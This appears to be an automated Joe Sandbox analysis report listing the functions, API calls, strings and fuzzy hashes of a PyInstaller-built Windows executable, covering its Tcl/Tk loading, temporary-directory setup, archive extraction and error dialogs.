GetProcAddress.KERNEL32 ref: 00007FF666DD7851
GetLastError.KERNEL32 ref: 00007FF666DD7863

Strings

Tk_GetNumMainWindows, xrefs: 00007FF666DD7C97, 00007FF666DD7CB9
Tcl_EvalObjv, xrefs: 00007FF666DD7BDF, 00007FF666DD7C01
Tcl_Finalize, xrefs: 00007FF666DD778F, 00007FF666DD77B1
Tcl_GetVar2, xrefs: 00007FF666DD7A13, 00007FF666DD7A35
Tcl_MutexUnlock, xrefs: 00007FF666DD78D1, 00007FF666DD78F3
Tcl_ThreadAlert, xrefs: 00007FF666DD79E5, 00007FF666DD7A07
Tcl_GetCurrentThread, xrefs: 00007FF666DD7847, 00007FF666DD7869
Tcl_SetVar2Ex, xrefs: 00007FF666DD7B27, 00007FF666DD7B49
Tcl_Init, xrefs: 00007FF666DD76C0, 00007FF666DD76DF
Tcl_CreateInterp, xrefs: 00007FF666DD770B, 00007FF666DD772D
Tcl_CreateObjCommand, xrefs: 00007FF666DD7A6F, 00007FF666DD7A91
Tcl_JoinThread, xrefs: 00007FF666DD7875, 00007FF666DD7897
Failed to get address for %hs, xrefs: 00007FF666DD76E8
Tcl_ConditionWait, xrefs: 00007FF666DD7989, 00007FF666DD79AB
Tcl_EvalEx, xrefs: 00007FF666DD7BB1, 00007FF666DD7BD3
Tcl_Free, xrefs: 00007FF666DD7C3B, 00007FF666DD7C5D
Tcl_Alloc, xrefs: 00007FF666DD7C0D, 00007FF666DD7C2F
Tcl_GetString, xrefs: 00007FF666DD7A9D, 00007FF666DD7ABF
Tcl_MutexLock, xrefs: 00007FF666DD78A3, 00007FF666DD78C5
Tcl_EvalFile, xrefs: 00007FF666DD7B83, 00007FF666DD7BA5
GetProcAddress, xrefs: 00007FF666DD76EF
Tcl_NewStringObj, xrefs: 00007FF666DD7ACB, 00007FF666DD7AED
Tcl_CreateThread, xrefs: 00007FF666DD7819, 00007FF666DD783B
Tcl_FinalizeThread, xrefs: 00007FF666DD77BD, 00007FF666DD77DF
Tcl_FindExecutable, xrefs: 00007FF666DD7736, 00007FF666DD7758
Tcl_DoOneEvent, xrefs: 00007FF666DD7761, 00007FF666DD7783
Tcl_ConditionNotify, xrefs: 00007FF666DD795B, 00007FF666DD797D
Tk_Init, xrefs: 00007FF666DD7C69, 00007FF666DD7C8B
Tcl_MutexFinalize, xrefs: 00007FF666DD78FF, 00007FF666DD7921
Tcl_DeleteInterp, xrefs: 00007FF666DD77EB, 00007FF666DD780D
Tcl_ConditionFinalize, xrefs: 00007FF666DD792D, 00007FF666DD794F
Tcl_SetVar2, xrefs: 00007FF666DD7A41, 00007FF666DD7A63
Tcl_ThreadQueueEvent, xrefs: 00007FF666DD79B7, 00007FF666DD79D9
Tcl_GetObjResult, xrefs: 00007FF666DD7B55, 00007FF666DD7B77
Tcl_NewByteArrayObj, xrefs: 00007FF666DD7AF9, 00007FF666DD7B1B

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 82f47625b105d2e24e20f05bf752ac3c20688f5871f0cc82716bfa26ccef99a3
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: 0F02D620A0DB07E0FA54AB95B9105B823B1BF89755F545231E82E8E2A0FF7EB548DF50

Function 00007FF666DD81C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF666DD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF666DD45E4,00000000,00007FF666DD1985), ref: 00007FF666DD9439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF666DD88A7,?,?,00000000,00007FF666DD3CBB), ref: 00007FF666DD821C

Part of subcall function 00007FF666DD2810: MessageBoxW.USER32 ref: 00007FF666DD28EA

Strings

CreateDirectory, xrefs: 00007FF666DD836C
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF666DD82C9
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF666DD81F3
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF666DD8363
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF666DD828D
%.*s, xrefs: 00007FF666DD82FC
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF666DD8230
\, xrefs: 00007FF666DD8251

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction ID: a53b750e82576e40b4634c320048f13079efe6a8ed0b3c900a119c877a05d4d2
Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction Fuzzy Hash: F851A311A1CA82E1FB61BB25F8516BA6270EFD4784F445631EA0ECE6D5EE3EE5048F40

Function 00007FF666DD2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF666DD21AB
SelectObject.GDI32 ref: 00007FF666DD21F2
DrawTextW.USER32 ref: 00007FF666DD2215
SelectObject.GDI32 ref: 00007FF666DD222B
ReleaseDC.USER32 ref: 00007FF666DD223B
MoveWindow.USER32 ref: 00007FF666DD228B
MoveWindow.USER32 ref: 00007FF666DD22CB
MoveWindow.USER32 ref: 00007FF666DD231E
MoveWindow.USER32 ref: 00007FF666DD2366

Strings

P%, xrefs: 00007FF666DD21FF

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 783c0c6a8ff39791057e401aa68d28294d39db0a70d8724c89e4eebca24f5321
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: D0510326618BA1C6D6349F22B4181BAB7B1FB98B65F004231EBDE87694DF3DD085CB10

Function 00007FF666DD80B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF666DD80EF
GetWindowLongPtrW.USER32 ref: 00007FF666DD816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF666DD8182
GetLastError.KERNEL32 ref: 00007FF666DD818C
SetWindowLongPtrW.USER32 ref: 00007FF666DD81A3

Strings

Needs to remove its temporary files., xrefs: 00007FF666DD8175

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: 535ea0d46e6ddc7ecfb88cd3d9ccfb109fe7db0e53f536f3b8d8d657d80d2e8e
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: 5E218E21B08A42C2E7569B7AB95417962B0EFC8B90F585331DE2DCF3D8DE3DD5958B00

Function 00007FF666DE6300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE6343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE6730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE69CC

Strings

f, xrefs: 00007FF666DE6465
p, xrefs: 00007FF666DE63F5
p, xrefs: 00007FF666DE646D
:, xrefs: 00007FF666DE64FC
-, xrefs: 00007FF666DE63D9

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 073dc7e9f5c84c138e1321db9430641f84b56f5c2445e52c629d56d4973d8646
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 63126C62E0C1D3C6FB206A16B5546BDB6B1FB40754F944635E78A8EAC8DF3EE5808F10

Function 00007FF666DE1038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE1078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE1440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE16DF

Strings

f, xrefs: 00007FF666DE117A
p, xrefs: 00007FF666DE111D
f, xrefs: 00007FF666DE12C5
f, xrefs: 00007FF666DE1110
p, xrefs: 00007FF666DE1182

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 6cc7f47e2d33192cc4f4e37d6e156f6ad0004bad1c799df88c00dd531c496679
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: EE125E72F081C3C6FB209B15F8546B9A671FB90754F984236E6998EAC4DF7EE4808F50

Function 00007FF666DD1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF666DD11F6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF666DD1098
fseek, xrefs: 00007FF666DD10D3
fread, xrefs: 00007FF666DD11FD
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF666DD10CC
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF666DD1108
malloc, xrefs: 00007FF666DD110F

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: cac4820a7b744c2a3ed9884ecbea95852d55726b30acd907294baaf881276d8e
Instruction ID: b3e9f7b004f6933a294373c8986a159723906637e9f4ff8f3537bf4bc1f1c0cc
Opcode Fuzzy Hash: cac4820a7b744c2a3ed9884ecbea95852d55726b30acd907294baaf881276d8e
Instruction Fuzzy Hash: A2418261B08652C2EA10EB52B8056B9A3B5FF94BC4F444632ED4D8F7D5DE3EE5058F40

Function 00007FF666DD1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF666DD15DF
Failed to extract %s: failed to open archive file!, xrefs: 00007FF666DD149F
fseek, xrefs: 00007FF666DD14E5
fread, xrefs: 00007FF666DD15E6
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF666DD14DE
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF666DD1518
malloc, xrefs: 00007FF666DD151F

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 36a1ab3064973414bc50407d7382ece4e743d8df21bb13a2de201f3127f22220
Instruction ID: 683897fc17c36bf7e74f2c86164fe3f3f911829db631b8931641269a3388a935
Opcode Fuzzy Hash: 36a1ab3064973414bc50407d7382ece4e743d8df21bb13a2de201f3127f22220
Instruction Fuzzy Hash: 29415121A08682D5EB10EB21F9416B9A3B0FF84798F444632EE4D8FB95DE3EE545CF40

Function 00007FF666DDEA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF666DDEAD5

Part of subcall function 00007FF666DDFA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF666DDFA6F
Part of subcall function 00007FF666DDFA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF666DDFA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF666DDEBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF666DDEDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF666DDEF08

Strings

csm, xrefs: 00007FF666DDEB56
csm, xrefs: 00007FF666DDEBD0
csm, xrefs: 00007FF666DDEAEF

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: 4a1ac581765010d6f99701619282aa8e4269aa2d9a3115a782bfbdd236044803
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: 4AD15F62908781C6EB20AB65E4403ADB7B0FB85798F140235EE8D9FB95DF39E591CF01

Function 00007FF666DD2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF666DD3706,?,00007FF666DD3804), ref: 00007FF666DD2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF666DD3706,?,00007FF666DD3804), ref: 00007FF666DD2D63
MessageBoxW.USER32 ref: 00007FF666DD2D99

Strings

<FormatMessageW failed.>, xrefs: 00007FF666DD2D70
%ls: , xrefs: 00007FF666DD2D22
[PYI-%d:ERROR] , xrefs: 00007FF666DD2CA6
Error, xrefs: 00007FF666DD2D8C

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: ea39ff5a0dfbbd28c333bce206189f4f86776459a581222d5bc7337ce1d71d6a
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: 4B31C722708B4182E620AB25B8106AB66B5BFC87D8F414235EF4DDF799DE3DD546CB40

Function 00007FF666DDDD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF666DDDFEA,?,?,?,00007FF666DDDCDC,?,?,?,00007FF666DDD8D9), ref: 00007FF666DDDDBD
GetLastError.KERNEL32(?,?,?,00007FF666DDDFEA,?,?,?,00007FF666DDDCDC,?,?,?,00007FF666DDD8D9), ref: 00007FF666DDDDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF666DDDFEA,?,?,?,00007FF666DDDCDC,?,?,?,00007FF666DDD8D9), ref: 00007FF666DDDDF5
FreeLibrary.KERNEL32(?,?,?,00007FF666DDDFEA,?,?,?,00007FF666DDDCDC,?,?,?,00007FF666DDD8D9), ref: 00007FF666DDDE63
GetProcAddress.KERNEL32(?,?,?,00007FF666DDDFEA,?,?,?,00007FF666DDDCDC,?,?,?,00007FF666DDD8D9), ref: 00007FF666DDDE6F

Strings

api-ms-, xrefs: 00007FF666DDDDDD

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: 284c04cec44c299714a020f6c4ec369c9f331eda09bfe457562355b8358560ff
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: F7318F21B1A642D1EE22AB02B800575A3A8FF98BA0F594735ED5DCF384EF3DE4448F54

Function 00007FF666DD6350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF666DD63F7
Failed to load Python DLL '%ls'., xrefs: 00007FF666DD6497
ucrtbase.dll, xrefs: 00007FF666DD63CD
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF666DD6446
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF666DD63B7
LoadLibrary, xrefs: 00007FF666DD649E

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: c6b32316bfe7a0aff6899d53276924ef6fe1744c5bc58fcca4aca07baf8add6e
Instruction ID: d3f2ecff0483a75e02fc98d1e66d27e3598ce7d9a49ef65791eec89d5f962218
Opcode Fuzzy Hash: c6b32316bfe7a0aff6899d53276924ef6fe1744c5bc58fcca4aca07baf8add6e
Instruction Fuzzy Hash: 3E416231A1C686D1EA21EB25F4552EA6335FF48384F800232EA5D8F695EF3DE615CF80

Function 00007FF666DD2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF666DD351A,?,00000000,00007FF666DD3F23), ref: 00007FF666DD2AA0

Strings

WARNING, xrefs: 00007FF666DD2AAF
Warning, xrefs: 00007FF666DD2B1E
0, xrefs: 00007FF666DD2B16
[PYI-%d:%s] , xrefs: 00007FF666DD2AA8
